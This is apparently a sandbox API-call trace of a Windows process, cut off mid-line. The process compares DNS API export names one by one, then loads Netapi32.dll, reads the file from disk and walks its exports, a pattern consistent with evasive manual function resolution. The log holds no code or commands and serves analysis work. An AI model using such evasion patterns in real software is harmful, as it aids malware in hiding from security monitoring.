[0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0107.947] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.947] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.947] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0107.947] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0107.947] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.948] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0107.948] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0107.949] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.949] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.950] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0107.951] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0107.951] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.951] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.951] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0107.951] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0107.951] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0107.952] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0107.953] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0107.954] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0107.954] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.954] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.954] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0107.954] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0107.955] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0107.965] GetProcessHeap () returned 0x430000 [0107.965] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a8d010 | out: hHeap=0x430000) returned 1 [0107.965] GetProcessHeap () returned 0x430000 [0107.965] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449320 [0107.965] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0107.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0107.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0107.969] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0107.969] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0107.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0107.970] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0107.970] GetProcessHeap () returned 0x430000 [0107.970] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13b00) returned 0x2d55030 [0107.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0107.970] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0107.970] CloseHandle (hObject=0x17c) returned 1 [0107.970] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0107.970] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0107.970] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0107.970] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0107.970] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0107.971] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0107.972] lstrcmpA 